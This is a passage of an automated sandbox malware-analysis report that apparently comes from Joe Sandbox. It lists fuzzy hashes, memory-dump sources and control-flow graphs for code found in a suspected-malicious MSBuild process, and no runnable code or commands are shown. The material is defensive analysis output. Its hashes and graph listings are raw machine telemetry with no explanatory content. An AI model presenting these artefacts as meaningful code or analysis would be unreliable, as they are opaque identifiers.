                                                • Opcode Fuzzy Hash: 11e1eadef633d91ab16e33ae0a85c82ad8760611e091d8359ccd0a26a17f8c7d
                                                • Instruction Fuzzy Hash: 0491D6B1D012588FEB68CF6AC944B99BBB2BF89300F14C0EAD40DAB255DB315E85CF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da08d35aa12581e2a4607bc7d51612915263ce4125c0fde1ecf1fd45a112fb99
                                                • Instruction ID: 80ccb4bde48446eaa4572733fc60c5fdd594299445a586b2edb9a56686c38be4
                                                • Opcode Fuzzy Hash: da08d35aa12581e2a4607bc7d51612915263ce4125c0fde1ecf1fd45a112fb99
                                                • Instruction Fuzzy Hash: 53819274E402189FDB14DFAAD884A9DBBF2FF89300F14C0AAD459AB365DB309942CF55
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 400f70108903f293eeca40428bedd188bd508df5056ce8999d96356301a1c6e6
                                                • Instruction ID: 7958a36d081ba9a03eabd3684a75c2b7266b182e0db2a20fe3720b4c845fa4df
                                                • Opcode Fuzzy Hash: 400f70108903f293eeca40428bedd188bd508df5056ce8999d96356301a1c6e6
                                                • Instruction Fuzzy Hash: DD819474E00218DFEB54DFA9D984A9DBBF2FF88300F5480A9E819AB365DB309945CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22e823fd1be327f1e34c3fff432bcd18ed2a6619f4ab3f453697c9746eb669a0
                                                • Instruction ID: 1659e61c2f1c26bd986c640bae5940c17504ede1ace5f5a66aab3f506a391400
                                                • Opcode Fuzzy Hash: 22e823fd1be327f1e34c3fff432bcd18ed2a6619f4ab3f453697c9746eb669a0
                                                • Instruction Fuzzy Hash: F4819574E00218DFEB14DFA9D984A9DBBF2FF88300F5490AAD419AB365DB309946CF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10c8c2d6979b93e7f944e503791ef8e81d4b248ff39d7fc06e96410a7ea5d5d2
                                                • Instruction ID: d3e5c960643b939d976d06a800fd8cfc5480a5316f4c3560bfc502156286c425
                                                • Opcode Fuzzy Hash: 10c8c2d6979b93e7f944e503791ef8e81d4b248ff39d7fc06e96410a7ea5d5d2
                                                • Instruction Fuzzy Hash: 6D819474E40218DFDB14DFA9D984AADBBF2FF88300F5490AAD409AB365DB309946CF11
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 222da74e632d8b19efb5815ba6d7dd0de11018ea3f5e9f330c3049257cddf823
                                                • Instruction ID: 9aa327f4208560e0b011f33e884eeb420c8372055655bc7e71811a4ad9e108df
                                                • Opcode Fuzzy Hash: 222da74e632d8b19efb5815ba6d7dd0de11018ea3f5e9f330c3049257cddf823
                                                • Instruction Fuzzy Hash: 4E819274E412699FEB64EF25D855BEDBBB1BF89300F1080EAD809A7254DB305E81CF44
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b220b2aba236866cd800ad575e68324d5027b359eb1b73c9da3c3a186dcb0d0c
                                                • Instruction ID: eb5385f6180f2ea308fa29892f88d248c35b0b06054464a45c2593d81b6f38d1
                                                • Opcode Fuzzy Hash: b220b2aba236866cd800ad575e68324d5027b359eb1b73c9da3c3a186dcb0d0c
                                                • Instruction Fuzzy Hash: 6B7185B5E41618CFEB68DF6AC944B9DFAF2AF89300F14C0AAD50DA7254DB344A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dabc395359b9ff6c1e5a58acf83c5e4829afdba5205c6d662cf85cdc70cb947
                                                • Instruction ID: 59fb95c2fd03881305ff53ac266bbda1f35bbeb87e83c7c8eb8071ff8bbaca33
                                                • Opcode Fuzzy Hash: 4dabc395359b9ff6c1e5a58acf83c5e4829afdba5205c6d662cf85cdc70cb947
                                                • Instruction Fuzzy Hash: 6171A3B1E016188FEB68DF6AC944B9DFBF2AF89300F14C1AAD50DA7254DB345A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11c2ffed1dcad19873068fd1d6dc3147298671f3a484973135b0c28bbb1d96ec
                                                • Instruction ID: 9cafa461b34e5330db3c22ef701337a81530c203536e295be0f3eacd910fe198
                                                • Opcode Fuzzy Hash: 11c2ffed1dcad19873068fd1d6dc3147298671f3a484973135b0c28bbb1d96ec
                                                • Instruction Fuzzy Hash: 6F61C474E006089FEB18DFAAD984A9DFBF2FF88304F148169D419AB365DB309942CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6955fa16e893a875bde8887ec794fca48eb6f3fa82f1885289470b06e0cd522f
                                                • Instruction ID: f228a80bd6a8e4bdb53878dcae6d13069421cdd8baeef18bd9e1c8fdda40bba6
                                                • Opcode Fuzzy Hash: 6955fa16e893a875bde8887ec794fca48eb6f3fa82f1885289470b06e0cd522f
                                                • Instruction Fuzzy Hash: 4A51E0B0D00208CFEB58DFAAC9447AEBBF6BF88300F54C16AC419AB254DB754986CF55
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 760d9c808dc9121c33d993abd5856772f2348ea4d33d6853e74a2da049d49c27
                                                • Instruction ID: 1599492839936c4d6e14c971fffced9b074193c538c05d13353c77608da53b3d
                                                • Opcode Fuzzy Hash: 760d9c808dc9121c33d993abd5856772f2348ea4d33d6853e74a2da049d49c27
                                                • Instruction Fuzzy Hash: AF5186B5E016588FEB58CF6BC94579AFBF3AFC9200F14C0AAC50CA6255DB740A86CF54
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9044e5473adbc514bec0fd37486ae3fcb8a96e2d0d96a45e4c6ab5f7ab440f26
                                                • Instruction ID: c96033c0072f6cb3beeb9b7530e273f532304c83ff741f21f9efb9d624247a5b
                                                • Opcode Fuzzy Hash: 9044e5473adbc514bec0fd37486ae3fcb8a96e2d0d96a45e4c6ab5f7ab440f26
                                                • Instruction Fuzzy Hash: B15175B1E016188FEB58DF6BD94579AFAF3AFC8210F14C1AAC50CA6254DB740A858F50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5831c68b9dc425f4aedbbc3a6f99a28c475463369fd55f51abcd9a8a9422e2b8
                                                • Instruction ID: 06f6a94057515898310157753cce9b56e963fee15b1f557e692de4e09d00b8cf
                                                • Opcode Fuzzy Hash: 5831c68b9dc425f4aedbbc3a6f99a28c475463369fd55f51abcd9a8a9422e2b8
                                                • Instruction Fuzzy Hash: D14158B1E016188FEB68DF6BD9457DAFAF3AFC8300F04C1AAC50CA6254DB740A858F55
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20905d73a6dc0c0a872bd247d741f8888d85d51cad0c1515c483b16c1974fb15
                                                • Instruction ID: 52b9b18ffbd329a5ae63944219778181fd970e7fb581d24fee89aa0e83bfa24c
                                                • Opcode Fuzzy Hash: 20905d73a6dc0c0a872bd247d741f8888d85d51cad0c1515c483b16c1974fb15
                                                • Instruction Fuzzy Hash: 29417AB1E016188FEB58DF6BC945799FAF3AFC8300F14C1AAC50CA6264DB740986CF54
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78dd5bf409e45082e759c5ff27612229ed0ad1578c55a67cefcbd3c5570c8ca5
                                                • Instruction ID: 961003ccb48ae26dbb8fac7ae6e061e66340a583abd68f5230b1735032c4d1fc
                                                • Opcode Fuzzy Hash: 78dd5bf409e45082e759c5ff27612229ed0ad1578c55a67cefcbd3c5570c8ca5
                                                • Instruction Fuzzy Hash: 3B4145B5E016188FEB58CF6BC9457DAFAF3AFC8301F14C1AAC50CA6254EB741A858F51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 337c00776e6248d819df09818cc261f84835e33da8d513365e532ebe0a1d543b
                                                • Instruction ID: 5642a309534c46a5325705ee6d6f0200f0c176f2431a420fbf72fc4a020d29ce
                                                • Opcode Fuzzy Hash: 337c00776e6248d819df09818cc261f84835e33da8d513365e532ebe0a1d543b
                                                • Instruction Fuzzy Hash: 534135B1E016188BEB58DF6BC94579AFAF3AFC9310F14C1AAC50CA6264DB740A85CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1125 6757b8c 1126 6757c4b-6757c5c 1125->1126 1127 6757c63-6757c6c 1126->1127 1128 6757c5e 1126->1128 1130 6757a43-6757a68 1127->1130 1131 6757c72-6757c85 1127->1131 1128->1127 1132 6757a6f-6757aa6 1130->1132 1133 6757a6a 1130->1133 1134 6757c87 1131->1134 1135 6757c8c-6757ca7 1131->1135 1143 6757aad-6757adf 1132->1143 1144 6757aa8 1132->1144 1133->1132 1134->1135 1136 6757cae-6757cc2 1135->1136 1137 6757ca9 1135->1137 1141 6757cc4 1136->1141 1142 6757cc9-6757cdf LdrInitializeThunk 1136->1142 1137->1136 1141->1142 1145 6757ce1-6757dde 1142->1145 1150 6757ae1-6757b06 1143->1150 1151 6757b43-6757b56 1143->1151 1144->1143 1148 6757de6-6757df0 1145->1148 1149 6757de0-6757de5 1145->1149 1149->1148 1152 6757b0d-6757b3b 1150->1152 1153 6757b08 1150->1153 1155 6757b5d-6757b82 1151->1155 1156 6757b58 1151->1156 1152->1151 1153->1152 1159 6757b84-6757b85 1155->1159 1160 6757b91-6757bc9 1155->1160 1156->1155 1159->1131 1161 6757bd0-6757c31 call 6757588 1160->1161 1162 6757bcb 1160->1162 1168 6757c33 1161->1168 1169 6757c38-6757c4a 1161->1169 1162->1161 1168->1169 1169->1126
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 06757CCE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707161162.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6750000_MSBuild.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5ec4e3b29100c7b679c85ec5608b7919271689afd966bcb20754e49f1b834b01
                                                • Instruction ID: c163e7df3ba45e3649d0a16ed75490d1d1746ffbfaff81d1365f8e8238c95194
                                                • Opcode Fuzzy Hash: 5ec4e3b29100c7b679c85ec5608b7919271689afd966bcb20754e49f1b834b01
                                                • Instruction Fuzzy Hash: 4E116D74E002099FEB48DFA8D884ABDB7FABB88314F25C295E904E7241DB719941CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3257 2b177f0-2b17cde 3332 2b18230-2b18265 3257->3332 3333 2b17ce4-2b17cf4 3257->3333 3337 2b18271-2b1828f 3332->3337 3338 2b18267-2b1826c 3332->3338 3333->3332 3334 2b17cfa-2b17d0a 3333->3334 3334->3332 3336 2b17d10-2b17d20 3334->3336 3336->3332 3339 2b17d26-2b17d36 3336->3339 3351 2b18291-2b1829b 3337->3351 3352 2b18306-2b18312 3337->3352 3340 2b18356-2b1835b 3338->3340 3339->3332 3341 2b17d3c-2b17d4c 3339->3341 3341->3332 3343 2b17d52-2b17d62 3341->3343 3343->3332 3344 2b17d68-2b17d78 3343->3344 3344->3332 3346 2b17d7e-2b17d8e 3344->3346 3346->3332 3347 2b17d94-2b17da4 3346->3347 3347->3332 3348 2b17daa-2b17dba 3347->3348 3348->3332 3350 2b17dc0-2b1822f 3348->3350 3351->3352 3356 2b1829d-2b182a9 3351->3356 3357 2b18314-2b18320 3352->3357 3358 2b18329-2b18335 3352->3358 3363 2b182ab-2b182b6 3356->3363 3364 2b182ce-2b182d1 3356->3364 3357->3358 3366 2b18322-2b18327 3357->3366 3367 2b18337-2b18343 3358->3367 3368 2b1834c-2b1834e 3358->3368 3363->3364 3378 2b182b8-2b182c2 3363->3378 3369 2b182d3-2b182df 3364->3369 3370 2b182e8-2b182f4 3364->3370 3366->3340 3367->3368 3376 2b18345-2b1834a 3367->3376 3368->3340 3444 2b18350 call 2b187e9 3368->3444 3369->3370 3382 2b182e1-2b182e6 3369->3382 3371 2b182f6-2b182fd 3370->3371 3372 2b1835c-2b18373 3370->3372 3371->3372 3377 2b182ff-2b18304 3371->3377 3376->3340 3377->3340 3378->3364 3384 2b182c4-2b182c9 3378->3384 3382->3340 3384->3340 3444->3340
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39f328d54d8cac11a59e225a5dbf20dc854c2be112d1bbc7ac347140ba21ceb6
                                                • Instruction ID: e3e8773ca11cd27074003a64dfb8682b3429c2a4658f82cbeff32203348d8036
                                                • Opcode Fuzzy Hash: 39f328d54d8cac11a59e225a5dbf20dc854c2be112d1bbc7ac347140ba21ceb6
                                                • Instruction Fuzzy Hash: A3525F34A00219CFFB15EBA4C860B9EBB76FF98700F1081A9C50A6B395CB359E85DF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3694 2b187e9-2b18805 3695 2b18811-2b1881d 3694->3695 3696 2b18807-2b1880c 3694->3696 3699 2b1882d-2b18832 3695->3699 3700 2b1881f-2b18821 3695->3700 3697 2b18ba6-2b18bab 3696->3697 3699->3697 3701 2b18829-2b1882b 3700->3701 3701->3699 3702 2b18837-2b18843 3701->3702 3704 2b18853-2b18858 3702->3704 3705 2b18845-2b18851 3702->3705 3704->3697 3705->3704 3707 2b1885d-2b18868 3705->3707 3709 2b18912-2b1891d 3707->3709 3710 2b1886e-2b18879 3707->3710 3715 2b189c0-2b189cc 3709->3715 3716 2b18923-2b18932 3709->3716 3713 2b1887b-2b1888d 3710->3713 3714 2b1888f 3710->3714 3717 2b18894-2b18896 3713->3717 3714->3717 3725 2b189dc-2b189ee 3715->3725 3726 2b189ce-2b189da 3715->3726 3723 2b18943-2b18952 3716->3723 3724 2b18934-2b1893e 3716->3724 3720 2b188b6-2b188bb 3717->3720 3721 2b18898-2b188a7 3717->3721 3720->3697 3721->3720 3731 2b188a9-2b188b4 3721->3731 3733 2b18954-2b18960 3723->3733 3734 2b18976-2b1897f 3723->3734 3724->3697 3738 2b189f0-2b189fc 3725->3738 3739 2b18a12-2b18a17 3725->3739 3726->3725 3735 2b18a1c-2b18a27 3726->3735 3731->3720 3742 2b188c0-2b188c9 3731->3742 3744 2b18962-2b18967 3733->3744 3745 2b1896c-2b18971 3733->3745 3748 2b18981-2b18993 3734->3748 3749 2b18995 3734->3749 3746 2b18b09-2b18b14 3735->3746 3747 2b18a2d-2b18a36 3735->3747 3758 2b18a08-2b18a0d 3738->3758 3759 2b189fe-2b18a03 3738->3759 3739->3697 3753 2b188d5-2b188e4 3742->3753 3754 2b188cb-2b188d0 3742->3754 3744->3697 3745->3697 3763 2b18b16-2b18b20 3746->3763 3764 2b18b3e-2b18b4d 3746->3764 3761 2b18a38-2b18a4a 3747->3761 3762 2b18a4c 3747->3762 3751 2b1899a-2b1899c 3748->3751 3749->3751 3751->3715 3756 2b1899e-2b189aa 3751->3756 3772 2b188e6-2b188f2 3753->3772 3773 2b18908-2b1890d 3753->3773 3754->3697 3774 2b189b6-2b189bb 3756->3774 3775 2b189ac-2b189b1 3756->3775 3758->3697 3759->3697 3765 2b18a51-2b18a53 3761->3765 3762->3765 3780 2b18b22-2b18b2e 3763->3780 3781 2b18b37-2b18b3c 3763->3781 3777 2b18ba1 3764->3777 3778 2b18b4f-2b18b5e 3764->3778 3770 2b18a63 3765->3770 3771 2b18a55-2b18a61 3765->3771 3779 2b18a68-2b18a6a 3770->3779 3771->3779 3787 2b188f4-2b188f9 3772->3787 3788 2b188fe-2b18903 3772->3788 3773->3697 3774->3697 3775->3697 3777->3697 3778->3777 3790 2b18b60-2b18b78 3778->3790 3784 2b18a76-2b18a89 3779->3784 3785 2b18a6c-2b18a71 3779->3785 3780->3781 3792 2b18b30-2b18b35 3780->3792 3781->3697 3793 2b18ac1-2b18acb 3784->3793 3794 2b18a8b 3784->3794 3785->3697 3787->3697 3788->3697 3805 2b18b9a-2b18b9f 3790->3805 3806 2b18b7a-2b18b98 3790->3806 3792->3697 3801 2b18aea-2b18af6 3793->3801 3802 2b18acd-2b18ad9 call 2b18258 3793->3802 3796 2b18a8e-2b18a9f call 2b18258 3794->3796 3803 2b18aa1-2b18aa4 3796->3803 3804 2b18aa6-2b18aab 3796->3804 3811 2b18af8-2b18afd 3801->3811 3812 2b18aff 3801->3812 3816 2b18ae0-2b18ae5 3802->3816 3817 2b18adb-2b18ade 3802->3817 3803->3804 3809 2b18ab0-2b18ab3 3803->3809 3804->3697 3805->3697 3806->3697 3813 2b18ab9-2b18abf 3809->3813 3814 2b18bac-2b18bc0 3809->3814 3818 2b18b04 3811->3818 3812->3818 3813->3793 3813->3796 3821 2b18c12 3814->3821 3822 2b18bc2-2b18bd4 3814->3822 3816->3697 3817->3801 3817->3816 3818->3697 3824 2b18c17-2b18c19 3821->3824 3825 2b18be0-2b18beb 3822->3825 3826 2b18bd6-2b18bdb 3822->3826 3827 2b18c1b-2b18c2a 3824->3827 3828 2b18c4e-2b18c60 3824->3828 3832 2b18bf1-2b18bfc 3825->3832 3833 2b18c93-2b18c9c 3825->3833 3829 2b18d61-2b18d65 3826->3829 3827->3828 3837 2b18c2c-2b18c42 3827->3837 3835 2b18c66-2b18c74 3828->3835 3836 2b18d5f 3828->3836 3832->3821 3844 2b18bfe-2b18c10 3832->3844 3842 2b18ce7-2b18cf2 3833->3842 3843 2b18c9e-2b18ca9 3833->3843 3845 2b18c80-2b18c83 3835->3845 3846 2b18c76-2b18c7b 3835->3846 3836->3829 3837->3828 3856 2b18c44-2b18c49 3837->3856 3854 2b18cf4-2b18d06 3842->3854 3855 2b18d08 3842->3855 3843->3836 3857 2b18caf-2b18cc1 3843->3857 3844->3824 3848 2b18d66-2b18d96 call 2b18378 3845->3848 3849 2b18c89-2b18c8c 3845->3849 3846->3829 3874 2b18d98-2b18dac 3848->3874 3875 2b18dad-2b18db1 3848->3875 3849->3835 3853 2b18c8e 3849->3853 3853->3836 3859 2b18d0d-2b18d0f 3854->3859 3855->3859 3856->3829 3857->3836 3863 2b18cc7-2b18ccb 3857->3863 3859->3836 3861 2b18d11-2b18d20 3859->3861 3869 2b18d22-2b18d2b 3861->3869 3870 2b18d48 3861->3870 3865 2b18cd7-2b18cda 3863->3865 3866 2b18ccd-2b18cd2 3863->3866 3865->3848 3871 2b18ce0-2b18ce3 3865->3871 3866->3829 3879 2b18d41 3869->3879 3880 2b18d2d-2b18d3f 3869->3880 3876 2b18d4d-2b18d4f 3870->3876 3871->3863 3873 2b18ce5 3871->3873 3873->3836 3876->3836 3878 2b18d51-2b18d5d 3876->3878 3878->3829 3882 2b18d46 3879->3882 3880->3882 3882->3876
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a7b09211ad8a528a95a6593ceee63c133e5c9cd147e9f117fa02969dfd73e20
                                                • Instruction ID: 522938ec11458beaf1ec66f4da035599b65e91e9783ec4d13ae582345667ac05
                                                • Opcode Fuzzy Hash: 6a7b09211ad8a528a95a6593ceee63c133e5c9cd147e9f117fa02969dfd73e20
                                                • Instruction Fuzzy Hash: 88F14B703146018FEB199A39C958B3A37A6FF86744F9944EAE502CF3A1EF25CC82C751

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3885 2b16e58-2b16e64 3886 2b16e14-2b16e2f 3885->3886 3887 2b16e66-2b16e8d 3885->3887 3900 2b16e31-2b16e4b 3886->3900 3901 2b16e4c-2b16e50 3886->3901 3888 2b16e93-2b16eb6 3887->3888 3889 2b172bc-2b172c0 3887->3889 3902 2b16f64-2b16f68 3888->3902 3903 2b16ebc-2b16ec9 3888->3903 3891 2b172c2-2b172d6 3889->3891 3892 2b172d9-2b172e7 3889->3892 3898 2b172e9-2b172fe 3892->3898 3899 2b17358-2b1736d 3892->3899 3910 2b17300-2b17303 3898->3910 3911 2b17305-2b17312 3898->3911 3912 2b17374-2b17381 3899->3912 3913 2b1736f-2b17372 3899->3913 3907 2b16fb0-2b16fb9 3902->3907 3908 2b16f6a-2b16f78 3902->3908 3916 2b16ed8 3903->3916 3917 2b16ecb-2b16ed6 3903->3917 3914 2b173cf 3907->3914 3915 2b16fbf-2b16fc9 3907->3915 3908->3907 3929 2b16f7a-2b16f95 3908->3929 3918 2b17314-2b17355 3910->3918 3911->3918 3919 2b17383-2b173be 3912->3919 3913->3919 3923 2b173d4-2b17404 3914->3923 3915->3889 3921 2b16fcf-2b16fd8 3915->3921 3924 2b16eda-2b16edc 3916->3924 3917->3924 3968 2b173c5-2b173cc 3919->3968 3927 2b16fe7-2b16ff3 3921->3927 3928 2b16fda-2b16fdf 3921->3928 3946 2b17406-2b1741c 3923->3946 3947 2b1741d-2b17424 3923->3947 3924->3902 3931 2b16ee2-2b16f44 3924->3931 3927->3923 3934 2b16ff9-2b16fff 3927->3934 3928->3927 3952 2b16fa3 3929->3952 3953 2b16f97-2b16fa1 3929->3953 3979 2b16f46 3931->3979 3980 2b16f4a-2b16f61 3931->3980 3935 2b17005-2b17015 3934->3935 3936 2b172a6-2b172aa 3934->3936 3950 2b17017-2b17027 3935->3950 3951 2b17029-2b1702b 3935->3951 3936->3914 3940 2b172b0-2b172b6 3936->3940 3940->3889 3940->3921 3955 2b1702e-2b17034 3950->3955 3951->3955 3956 2b16fa5-2b16fa7 3952->3956 3953->3956 3955->3936 3962 2b1703a-2b17049 3955->3962 3956->3907 3963 2b16fa9 3956->3963 3965 2b170f7-2b17122 call 2b16ca0 * 2 3962->3965 3966 2b1704f 3962->3966 3963->3907 3985 2b17128-2b1712c 3965->3985 3986 2b1720c-2b17226 3965->3986 3970 2b17052-2b17063 3966->3970 3970->3923 3972 2b17069-2b1707b 3970->3972 3972->3923 3975 2b17081-2b17099 3972->3975 4037 2b1709b call 2b17438 3975->4037 4038 2b1709b call 2b17428 3975->4038 3978 2b170a1-2b170b1 3978->3936 3982 2b170b7-2b170ba 3978->3982 3979->3980 3980->3902 3983 2b170c4-2b170c7 3982->3983 3984 2b170bc-2b170c2 3982->3984 3983->3914 3987 2b170cd-2b170d0 3983->3987 3984->3983 3984->3987 3985->3936 3989 2b17132-2b17136 3985->3989 3986->3889 4004 2b1722c-2b17230 3986->4004 3992 2b170d2-2b170d6 3987->3992 3993 2b170d8-2b170db 3987->3993 3990 2b17138-2b17145 3989->3990 3991 2b1715e-2b17164 3989->3991 4007 2b17154 3990->4007 4008 2b17147-2b17152 3990->4008 3996 2b17166-2b1716a 3991->3996 3997 2b1719f-2b171a5 3991->3997 3992->3993 3995 2b170e1-2b170e5 3992->3995 3993->3914 3993->3995 3995->3914 4002 2b170eb-2b170f1 3995->4002 3996->3997 4003 2b1716c-2b17175 3996->4003 3999 2b171b1-2b171b7 3997->3999 4000 2b171a7-2b171ab 3997->4000 4005 2b171c3-2b171c5 3999->4005 4006 2b171b9-2b171bd 3999->4006 4000->3968 4000->3999 4002->3965 4002->3970 4009 2b17184-2b1719a 4003->4009 4010 2b17177-2b1717c 4003->4010 4011 2b17232-2b1723c call 2b15b50 4004->4011 4012 2b1726c-2b17270 4004->4012 4013 2b171c7-2b171d0 4005->4013 4014 2b171fa-2b171fc 4005->4014 4006->3936 4006->4005 4015 2b17156-2b17158 4007->4015 4008->4015 4009->3936 4010->4009 4011->4012 4025 2b1723e-2b17253 4011->4025 4012->3968 4016 2b17276-2b1727a 4012->4016 4019 2b171d2-2b171d7 4013->4019 4020 2b171df-2b171f5 4013->4020 4014->3936 4021 2b17202-2b17209 4014->4021 4015->3936 4015->3991 4016->3968 4023 2b17280-2b1728d 4016->4023 4019->4020 4020->3936 4028 2b1729c 4023->4028 4029 2b1728f-2b1729a 4023->4029 4025->4012 4034 2b17255-2b1726a 4025->4034 4031 2b1729e-2b172a0 4028->4031 4029->4031 4031->3936 4031->3968 4034->3889 4034->4012 4037->3978 4038->3978
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dcab532c7975878a2d2a76c75caff60c9c45838022d6a9855bdf012e14a278e
                                                • Instruction ID: 46a8802cf2dad02a393cdb03d3073922c8ddc4a716b48c55d3d179efc3db4bd7
                                                • Opcode Fuzzy Hash: 9dcab532c7975878a2d2a76c75caff60c9c45838022d6a9855bdf012e14a278e
                                                • Instruction Fuzzy Hash: EB222831A00209DFCB14DF69D884A9EBBF2EF89314F558599E949DB3A1DB30ED41CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
